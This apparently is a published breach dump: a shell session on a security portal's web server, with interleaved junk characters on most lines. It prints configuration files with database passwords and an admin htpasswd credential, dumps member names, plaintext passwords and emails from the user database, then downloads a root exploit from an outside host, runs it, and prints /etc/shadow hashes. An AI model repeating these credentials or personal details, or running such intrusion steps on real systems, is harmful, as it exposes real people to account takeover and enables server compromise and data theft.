drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
7 M' S1 i+ {; L' m6 N4 Q8 d% Ldrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
- @, j1 k2 Q+ h9 R. l- I1 |$ Idrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
' ~) N% V( R* N5 ~drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记[email protected], N: j# ]% R/ L: L
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
! b) e, [# T ]6 Odrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
. T) w D7 }, ~5 Q$ [-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg, R+ `3 o; J8 o! J
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config( U8 G+ s y, V5 K& W: G( F, n
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
% s: J6 b5 e# ~. q* ]drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
* O# \! n: M' H9 Q& I+ Y# }/ V-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php }! B0 U8 P% B
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
5 v: j7 Q5 D- i6 Z; B' ]drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
0 U. ?- s9 ^7 Vdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour! g" C' ] d- k3 ?$ l
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess' f% b6 d \; a' B! a: c
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess0 p, M; [1 Y( E5 n! w# c
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php( c7 s' r! b0 R1 i6 k: `, I
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
& M7 T6 ?% l% G: ~: \5 d; Q! |/ ?+ d-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
. b2 R2 t6 q C-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
5 W; Q5 J/ K% r0 v$ Y! ]-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
5 y2 c" l4 N1 ?8 |9 l: A, Vdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc" M' ^% y X$ _
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
2 z# g- D$ {- o F) x- Wdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib/ b) `4 P6 t9 W4 h* h
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
$ k1 H9 ^: x$ e+ i1 o1 y2 cdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
) d" o0 ]- L# t k; Mdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
, E/ \+ Q: Y0 s | S8 A! l9 D2 l6 cdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new/ Q0 l( X% Y) c4 f% `( G
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
6 ~' q- ^) Z$ Q+ p4 n: \" X% @drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
4 `4 x0 p8 a R7 P& S+ Z& z# n-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
3 R4 O1 I/ o7 E l/ g9 m' f) e" bdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
. Q. W1 j5 S- t( I" Mdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
9 j; {) L9 }7 R h. [. B2 Idrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
/ f/ T- n( u, [$ [drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
2 i% b6 H; m$ Y) Ydrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src8 p4 m# R& K, W) ?: z @
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
' s, d* J3 f/ qdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2, K' c" D( u; M- w) \
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old+ g b! z- v( |" R5 t
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php6 V f' M; R+ X/ _" M
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
8 A( M! M G5 Z+ Z' _# w& ?6 c$ T& T) f
sh-3.2$ head -20 index.php
2 |) o O- R6 U8 G. N* u<?PHP
0 D" z9 k, x* G9 j# E. ^- a' p( e/**$ Q8 w+ N# V! _3 a0 n
* Mainfile (external) for astalavistaNET v2.0- D. B( v( [6 j+ L
*
6 s/ C$ G. ?, _2 C* @copyright Astalavista IT Engineering GmbH' k$ C& X1 V2 k- i; H
* @author Thomas Kaelin <链接标记[email protected]>
' e0 w0 v% Y5 i* @version 1.0
2 T- D7 u: J0 K( K*/
# {9 b; F9 ~$ \
0 o2 P0 G, M" r$ G B if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
! U1 ^# f1 h, G" r) V. x; y1 A2 | $dontStartSession = false;
3 ]+ z2 P$ K. i, M8 a/ t } else {
+ m) q& z" F U1 W2 Z. h+ a( q $dontStartSession = true;, g9 d- Y. T6 R
}5 |5 o0 ^' ~4 I3 Q% v' d% {
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);( F. O. Y+ s$ L8 N0 Q) O
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
2 y* ?, C E. M5 B require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
& D# `$ A4 ?" {" N6 W K require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’); [) s8 L( M$ Z2 }
4 E3 s! ^: {* s+ m) L9 y0 ?sh-3.2$ cd config( M, M3 ~, U: N
sh-3.2$ ls -la
+ S M4 r# v5 H4 ^! Itotal 32
m7 `8 {8 x- v" Pdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
6 r+ R2 Q& }2 wdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
+ Z6 {1 \5 b% r-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php) u2 _$ V/ y5 ^4 \/ ^
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
. ?- a# ]% Q8 x$ n-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php' j) O4 ?* n& e
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
, F i& A9 u6 w6 l-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
) X& C2 E+ ]4 T ~/ r: L& w9 L" H3 i% R- }4 J3 k# n
sh-3.2$ cat com.conf.php
6 m1 d- N9 X9 A& P7 L( g5 y( ]$ Q[snip]
4 F6 k H- \: A8 J//member-database) F! X; Z0 ?9 B x3 w
$_CONFIG['db_mem_server'] = ‘localhost’;% F7 u0 d& e B4 j' k8 \( v" |
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
. M K/ A* t5 \$_CONFIG['db_mem_user'] = ‘astanet_db’;
, V6 Y7 N$ t* n& L1 m% V4 q$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
% A! o: H0 l7 v6 R8 h$_CONFIG['db_mem_debug'] = false; //true or false
+ U8 t, U; K! `5 Z//ads-database. W+ w. [2 l6 {$ T# |4 [
$_CONFIG['db_ads_server'] = ‘localhost’;
& f! U) n- _! U- l: x- E' m. @4 w: g$_CONFIG['db_ads_database'] = ‘astanet_ads’;/ W7 x# `( m8 B
$_CONFIG['db_ads_user'] = ‘astanet_db’;
8 w! a6 T! p- \# {0 i$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
1 M; u# e. P3 A% I) v' d$_CONFIG['db_ads_debug'] = false; //true or false
* ^4 \# t% ^* M" n& Q# M3 L* q+ u//rainbow-database7 F+ x! U( W9 w0 ` D) Q: F
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;) S( y. H L: U& U/ V" V" @
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
$ }) |8 D1 @, Q$ m$ J) a$_CONFIG['db_rainbow_user'] = ‘dinu’;4 b! t% W/ c7 v2 w
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
1 i* n: I) |' N' I2 z1 z$_CONFIG['db_rainbow_debug'] = false; //true or false
$ J9 b( h& t% u3 Q3 o( n8 v6 [7 K//mailing lists database- m& v' R+ Z+ L, A+ O8 r. Y+ ?
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;5 A: `! r8 G3 c1 R/ V
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
1 d+ I3 y) u$ }- M3 n$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;( Y( k6 v0 N. c! x
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
( y4 w5 p/ w% @# {$_CONFIG['db_mailing_lists_debug'] = false; //true or false- T4 W! {2 }( U
//paypal5 w9 s7 I/ X' X! W/ f
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;9 l# u2 E3 C1 l; U/ {6 l
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;( u0 M" Q5 l4 e/ ^
$_CONFIG['sub_pp_business'] = ‘链接标记[email protected]’;
& C+ v6 ^1 s1 M; a V) ~7 j2 k$_CONFIG['sub_pp_noship'] = ‘1′;+ B& D+ X( J! k; C
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
* Q( K- V/ r1 c8 a+ c/ b[snip]
: G* e, V) {9 p* O
+ ?$ r* a9 B" Nsh-3.2$ cd ..* C- f& o6 O4 O# U, I$ W1 N) @
sh-3.2$ cd member; U, d: b1 Z6 \( Z, K
sh-3.2$ ls -la4 Y- r0 s: W+ P
total 20
( l9 Z5 J; r) gdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .( C6 F# A+ M' q7 s0 g
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..7 r1 S; O) a V8 x- V9 m E2 f
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess! b% ]! o" d8 [3 V" P. M9 P
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php0 V3 C* Z5 L F" c; Q. [9 [4 g+ k
sh-3.2$ cat .htaccess. j C c# ^9 V% u) y
SecFilterEngine off* z: Y- M& Y9 B3 I
6 D4 ^+ l H* m9 O; g# Z
sh-3.2$ cd ..7 `! H L* @3 q8 x1 ^& w4 p) u
sh-3.2$ cd cron
) ~# Q7 x' L7 @- Xsh-3.2$ ls -la- v$ F3 A4 x$ K' A& g& Z; G
total 168
! ?; Z6 ^: z4 c8 idrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .- J8 }; K2 o& m4 G3 @7 b, l; |9 H+ @+ m
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..* M: C$ j1 _, N
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php: Z- M$ F2 z$ \
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php, q$ G+ D9 M) J( t
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php+ ]4 L. n3 ]7 D5 h# M( D
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
" c7 f" E/ J- i6 u3 m9 Q-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
+ |6 R8 i9 q+ v d) E-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php5 u! a |1 j1 K9 `2 `
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php, U' j/ n& y; r' l
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
* g- h- ~ ?$ H8 \2 j/ x7 `5 o0 O-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
3 B; l9 E+ E X) B-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
! N1 p5 Z+ f8 ~- ^$ b1 Q-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
$ }2 u0 A5 x6 }& s- F. `-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
. E. r: X T3 I) |! ]-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh7 Y5 u$ Z& N7 T
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
5 O! j( D6 {- D-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
( `3 A3 j* @8 Q; v! B0 f3 c-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php! h F+ }/ }+ @/ w% i. ~$ t
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php& g1 G! y& _/ @3 ?' J/ }
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
+ Q- q" x$ ~0 ?1 [drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
4 a' K1 w$ y D9 a! s-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
% V& U, h+ O$ k) |-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
7 a# K7 Z* w3 i8 R: ^2 \) O% v1 T& s3 b0 L) s& j: J$ a0 O x5 k
sh-3.2$ cd ..# i s5 n$ Y; M6 W3 e8 n- l
sh-3.2$ cd _007
. q8 K% l" J$ osh-3.2$ ls -la0 l6 K! v, C' d- j: Y- j
total 24; c T- q( s; h5 m' `+ @3 l) C
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
2 O ?# w0 V/ r5 {; A( ldrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
0 C; f1 f: g/ _5 g6 Q+ ]-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
1 Z$ s3 k* }6 n% \/ A2 K& c-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php( v0 ^5 t0 Y2 l# a
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
! a: O) e) E8 \: V! P, vdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
( K4 x% k) C( ^, A6 E1 @6 d1 L& g# }' N' u) ~! y, h7 \
sh-3.2$ cat .htaccess
+ H, C4 N! O8 X) T) gauthType Basic5 J/ W& j {# p! f% e
authName Admin
% v6 z. [9 _5 R( m) UauthUserFile /home/astanet/auth/.htadm_pwd* ^ R( d8 T H, g8 C. d8 ?
require valid-user- ]" f; N8 k5 A$ a# F
" s8 u+ [0 w1 @+ X6 e2 G7 s$ V# Ksh-3.2$ cat /home/astanet/auth/.htadm_pwd! O1 h& a" k" d0 M P( F! x, F
admin2net:CR0bl65MwhfT
" @! n8 t+ D! Q! e" Q6 I) `" @
! G- m+ V; z: K- }. h, ~/ jsh-3.2$ mysql -u astanet_db -p3 T( Y! ?; p+ N0 Y Y0 c
Enter password:
+ R2 ?; s) u/ IWelcome to the MySQL monitor. Commands end with ; or \g.: w+ Z1 ]- y q
Your MySQL connection id is 275153
) g5 L2 T, m5 d5 Z' yServer version: 5.0.45-community-log MySQL Community Edition (GPL)
3 {5 W8 E9 k P0 i4 l/ X
% N, Z& F5 v7 E/ O( ?5 J% `$ ]Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.4 f+ r4 M u8 U: g- X
0 c# g0 A( E9 F; b5 ]% tmysql> show databases;# Z, H& F1 j* G
+———————–+/ p0 x% Y# P, k7 B# a9 x% [" ]' ?
| Database |: e: E W0 P$ v2 N
+———————–+2 G- P' a. ]% X# z
| information_schema | ^ G( v0 q) C, M6 q0 ?$ `
| astanet_ads |
( x: q p6 y, e! s# q| astanet_mailing_lists | u( }4 T% `5 e/ \6 g
| astanet_mediawiki |
* K5 x N% |, N9 y| astanet_membersystem |- N2 b8 W* l3 @6 U4 z& F
| test |
2 y7 B6 I) [2 o6 E7 J' M+———————–+2 A8 ]6 o( w) Q
6 rows in set (0.00 sec)( Y3 P9 ^2 `+ O4 w5 @# x
; \# R& c3 m2 k3 W) D" F }mysql> use astanet_membersystem
( r9 `0 R0 `5 `- [; h. W) ?Database changed% x- d* R8 o3 b* \ ~
mysql> show tables;& R6 t3 j8 A& m; a* M! t+ R4 i
+———————————–+# j$ h4 [! Q. f" G
| Tables_in_astanet_membersystem |
( _; v" B) D ^! L6 p/ g* U+———————————–+
* d5 p* t/ J6 ]: ]7 ]: i. @| blacklist_categories |# |9 O% m7 P) d
| blacklist_content |" N6 C* d: V4 P0 d& d
| blacklist_levels |
% U) b2 O7 v- R2 \| blacklist_mcset |- T6 u" \5 L. S- B1 X) {6 P+ F
| dir_categories |
5 h+ R7 t6 A V0 ?! C; E* N| dir_comments |# _2 g: M$ b5 \6 t- m8 u# N }
| dir_links |
a* q; ?, L4 g* r| dir_temp |/ U+ G( B! h; _
| dir_votes |+ l+ C/ q2 }+ N: q
| documents |
2 T$ ]3 {8 r6 b/ C7 V8 S! D, u| documents_categories |
; o) Y v1 [, g, s| email_content |
0 l" {, x7 f& u! N+ k| email_settings |) x, f& T/ e: _+ N, W
| exploits |" ~; K6 q0 f* A# W( @
| exploits_categories |7 ~4 a1 i' J+ C5 \) {0 b
| exploittree_categories |: h/ O. E( z" x$ U, I- l1 r) n
| exploittree_exploits |1 D% J! s a" d$ v0 {1 [) g9 L6 Q1 u
| home_values |
, ? d% H6 ? Y| iso_countries |% u: x4 O4 c+ U7 r/ w
| links_categories |, t* q/ X% E+ R0 Y% D" h
| links_records |
$ }3 y+ I8 O5 o8 e t: R9 E( A; x| links_unauth |
; S6 Q4 L! l5 E9 X| links_votes |
* F, [8 N F5 h. k: S- Z I* v| log |
" F s* u* \; r; X| news_categories |4 o! y6 s& I; c6 q2 v" @2 s
| news_comments |6 a- D1 \4 J: z/ |. }) e
| news_emoticons |
, y6 d: Y( d/ z5 d5 K! ^, I| news_latest |" H3 s$ n8 b5 f( T: \8 J) |2 T
| news_messages |9 `, S( C5 s. j# t
| news_statistics |0 M; m0 ]5 u, M& Q' b6 F3 i
| news_votes |
4 h3 S% z% P6 g, L$ l) Y| prices_content |5 f' j0 t @' d% Y& |4 Z9 U
| prices_offers |) r) E* a+ p: K5 V
| rss_settings |7 B2 P/ b3 \1 q, ]0 h7 P' p/ e F
| sessions |# v4 o2 E% v) k
| stats_signups |
, @+ o5 ?' k ]; a2 [| u2u2 |4 G+ Z+ j8 {6 r1 ^( Q) n
| u2u_contact |6 ^8 X: \: r5 M7 H
| u2u_settings | ^$ }' W9 E. _
| user_keywords_selected_categories |+ }" o. q, r% u: \) Y
| users |
! U5 S v) p5 i9 |& G| users_ipn_test |% A: W* b! S8 F7 Z4 _
| users_keyword_values |
/ f& e0 B7 X. K k8 N| users_profile |
0 B; i5 I# G; m# W2 C| users_temp |
* J1 I D/ {" \; F5 D| users_upgrade |
/ _. w6 A! r& ?, t+———————————–+% C% g2 N# g( z% e% p( ?$ l
46 rows in set (0.00 sec); R. U5 h2 @/ k) } H7 L/ {
3 U& i# A/ [* ~" i2 l$ bmysql> describe users;
. Q' g5 T$ X7 u, b. v1 M+————————–+————————————–+——+—–+———————+—————-+8 h& M7 m/ A/ k' P' U% q, b, G
| Field | Type | Null | Key | Default | Extra |% |8 H- Q1 \' r2 c* ~
+————————–+————————————–+——+—–+———————+—————-+
- F/ ]& v& a; I0 V( T! E) a| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
9 U) `. D" A( i, V D| user | varchar(50) | NO | | | |" M, X- t& y( g+ w- w5 N
| nickname | varchar(30) | NO | MUL | anonymous | |
/ w/ R3 b, m2 w: B$ J" m y# J) N* I| password | varchar(30) | NO | | | |
0 F- f0 f3 w, l# `3 R! I# X, Q5 w| userlevel | tinyint(3) | YES | MUL | NULL | |0 P- t c; `) J, L v9 L( _
| exp | int(8) unsigned | NO | | 0 | |
3 u+ H. K3 m2 t2 W" m| email | varchar(50) | NO | | | |
+ w& U; v2 o0 c, }8 p% x6 i+ e| ip | varchar(15) | NO | | 0 | |( h8 r0 R- P2 b- J
| proxy | set(’0′,’1′) | NO | | 0 | |% N; y9 N/ ~3 D: q" d9 T( a% H
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
7 K4 P$ x/ T9 ~2 e& h1 ~6 k. l| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
* k- c, k7 @0 \5 a! v8 y$ J| anz_in | tinyint(1) | NO | | -1 | |3 ^ d3 }% M3 P" k0 e% I
| status | tinyint(1) unsigned | NO | | 0 | |
$ \6 V9 X) [' M* F" f, D$ l| checked | set(’0′,’1′,’2′) | NO | | 0 | |
8 r2 _5 c( G8 G. {! m$ P| freemember | set(’0′,’1′) | NO | | 0 | |
( E E8 D5 A1 K! k7 C4 j| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |% e: \, a `- `, C" Y. a
| lang | tinytext | NO | | | |& y0 J7 O X: D- G1 c: `
| adid | smallint(6) | NO | | 0 | |
" z4 T8 a, R1 P, n: A; E| pp_txn_id | varchar(255) | YES | | NULL | |
; I9 B& [1 r0 Y" O k& ]# n p| cnb_transaction_id | varchar(255) | YES | | NULL | |
, g/ Y; [) D& @' }1 ^$ P5 p( G9 F| cnb_order_id | varchar(255) | YES | | NULL | |3 E4 m( T+ d1 X/ e: a1 z
| cnb_user_id | int(11) | YES | | 0 | |
3 Z4 X+ [# Z! X2 l2 d4 } }+————————–+————————————–+——+—–+———————+—————-+
7 P# m$ }. R7 T( s2 x- c+ z4 _1 \22 rows in set (0.01 sec)8 B4 l) m% Q% X, M
& o5 }1 S# @" z3 P" j6 H# e
mysql> select count(*) as skids from users; P. M+ p, L+ j! G+ o) i( P0 ~5 q
+——-+) j! h$ ^8 |9 r/ {2 M' Z2 ?
| skids |# _; j; P; O; V0 y9 V0 d
+——-+* j! k8 I. K( S5 m/ \- V; a. p
| 25199 |
4 O- a% E! x+ S6 K8 l) `2 N+——-+
* k2 u7 o) P* h+ d, f/ N9 B" X3 {1 row in set (0.00 sec)7 Z* |% t: L) @$ R D' l
$ ~- {' @1 u, E" ^/ Xmysql> select user,nickname,password,email from users where userlevel = 1;# r- B" b D6 I/ h
+————————–+———————-+——————+———————————–+! Z/ ]" h* G6 }4 f
| user | nickname | password | email |2 e6 m0 \# W. ~. h
+————————–+———————-+——————+———————————–+
* R- ~' T! [) k1 M3 q5 C| pascal | prozac | astaman3 | 链接标记[email protected] |
, |# F# a# X1 Y; K& F| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记[email protected] |
* l# [% r. ?9 v; D| qreymer | Palermo | qblsw85iam | 链接标记[email protected] |
0 E( [3 h9 R0 L9 B8 `2 L| Christian Wehrli | g0atherd | hitt?74 | 链接标记[email protected] |! T7 J- p6 L7 A" {# \8 C
| Andrew Blake | Minky | liq73uid | 链接标记[email protected] |! W$ n4 k$ q0 H6 |7 j; x$ z" {
| Martin Wyss | dinu | kj63;cXy | 链接标记[email protected] |" F) P" l8 n: P2 n/ t! z
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记[email protected] |
9 R4 `6 M5 `$ i% u9 B' p$ }4 J+ I| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记[email protected] |
- {$ @6 K6 H* K0 Z9 a$ m% ?7 ` [| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记[email protected] |
& d& c* V- u' e* W( `# ^| David M Lee | Daremo | icG12m03 | 链接标记[email protected] |
/ X2 k9 Z0 q( h| David Corn | akriel | ve3uB$cUku | 链接标记[email protected] |; t+ U9 B* }. m0 e2 j
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记[email protected] |
9 t) k5 [& @4 g5 [| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记[email protected] |
- {' r" f) G0 h7 V| David Ellis | dellis203 | philip | 链接标记[email protected] |
: i# r: s3 h" p) e| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记[email protected] |
# H {, r% F, d* a9 G; L| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记[email protected] |
6 i) {) q9 e1 [' i+ i6 i$ T0 Q& O; V| Thomas D?ppen | daha | asta4tom | 链接标记[email protected] |
8 Q) l, e/ j+ Y4 N- v$ _7 g| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记[email protected] |
0 y |1 m2 H/ y4 s/ Y' Z6 m. Y| Fabius Bernet | traviser | wellenreiter100 | 链接标记[email protected] |! _9 s. G2 w. f) }
| Zachary McElroy | duder1 | dirty245dix | 链接标记[email protected] |
( K& G7 o! Y/ x* k| Leron Cohen | cohen2 | leron4free | 链接标记[email protected] |
/ |" m( V3 K! @$ q$ `( [| Beatriz Pontes | anonymous1656 | pitas | 链接标记[email protected] |
& Q5 O' C6 `2 W9 q4 ]! S| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记[email protected] |/ [6 K2 ~2 b# a: M# w. g
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记[email protected] |/ \: r; s1 U. W! U. \& |
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记[email protected] |# b, N% y) ^ [! p. n3 u$ [& }" q
| sykadul | sykadul | ak29eral | 链接标记[email protected] |
/ L% T7 c, e1 |/ t6 C| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记[email protected] |. r+ h O. X* F. \6 B4 u
+————————–+———————-+——————+———————————–+8 d3 o7 h6 D5 l3 T( Q% L$ t7 r
27 rows in set (0.00 sec)
. L3 t% L- A8 [) R$ L* U. X& [0 f( \& e! K) _2 n! ]
mysql> exit;. L. X6 J L" ]7 F% a
Bye
1 N1 w. c$ W9 ~+ y: p# t7 b8 u( d0 \' ?) U" G4 A% Z
[~] plaintext passwords? yes,% O, G0 a1 c( s! i
Those so called “security professionals” who charge you $6.66 / month to
. t. p. V! G# Y' wregister at their hack-proof portal, save your passwords in plaintext…* b( e3 r) e6 r5 D) h; U
brilliant!
: o; {1 O1 A; d+ C x8 A% \/ X
5 W7 X5 y5 o' e) v( K2 {[~] This been fun but we want more.
, N7 f: t& i, |7 {
1 Z8 i) e/ c5 B0 U: a5 J/ [sh-3.2$ uname -a
) G# @9 w+ H4 k4 e: e2 _Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux, S+ U8 r/ m& W$ W# I8 g
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]/ {% T+ n7 Y3 x% o' z# x$ l
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url] ]9 y; M' _3 ~9 H# Z m8 D3 Z
Resolving anti.sec.labs… 13.33.33.37
/ r' E% S$ ^2 F: D$ rConnecting to anti.sec.labs|13.33.33.37|:80… connected.
( P' K& @" I% V9 N7 y( d9 \; aHTTP request sent, awaiting response… 200 OK( \& _" J7 u& n( U
Length: 18200 (18K) [text/plain]; w0 I, U3 ~6 Y3 @! m* Q
Saving to: `g0troot’5 j% }' p" Q# y4 d0 ~
) M- z" |% U' P, g, s5 s100%[=========================================================================================================================================>] 18,200 58.6K/s in0 @2 h' k! P* Z! s1 K2 _; Q
0.3s
1 G0 }( M/ C4 x( U# }
7 }9 G$ s/ G3 H" p' j/ |18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]) s! q; V6 j0 o- q
& P# N8 t6 @4 U* gsh-3.2$ ./g0troot -i x86_64
3 I! W" l% M4 S& A4 W3 E2 {[+] g0troot - anti.sec.labs( a& L% `% g" V9 z; X! Z( }
[+] Target: 2.6.18-128.1.10.el5( o9 n$ r/ e1 b9 q2 f
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
; L8 G' }. H7 U
0 U3 w* Q4 _* \1 l3 G' w( x; u[+] r00tr00t
' C7 l% R- z" v* Q# Z+ \[~] Executing shell…
) Y9 |7 l. t/ F9 H* [1 V# W5 K N# ?
sh-3.2# id1 D) S1 x1 `- j& z" P* w) |
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
- @& Q5 d B4 m/ S! I; j
) u* Z6 n% ]( s* ^3 Ysh-3.2# cat /etc/shadow. S( K, e( }0 b* y- N: @2 W
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::$ @1 U. x1 P1 Y2 @' m b9 P
[snip]6 N1 H( n. g" k
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
, k! `6 K* R! I' O4 kjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
4 g. h" V1 \/ f7 |8 dcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::1 a0 Z) w/ M+ m1 |
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::3 W. H, z e9 z+ U
4 K/ S/ z/ x+ Q& X" V; n% osh-3.2# cat /etc/motd( n# O$ L- s' O! b/ w
#####################################################7 | L( y3 L% D( W V1 M
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ ## _6 u: N& h; J7 T& t
# |__| [__ | |__| | |__| | | | [__ | |__| #: c9 Z. I- P$ l! A
# | | ___] | | | |___ | | \/ | ___] | | | #
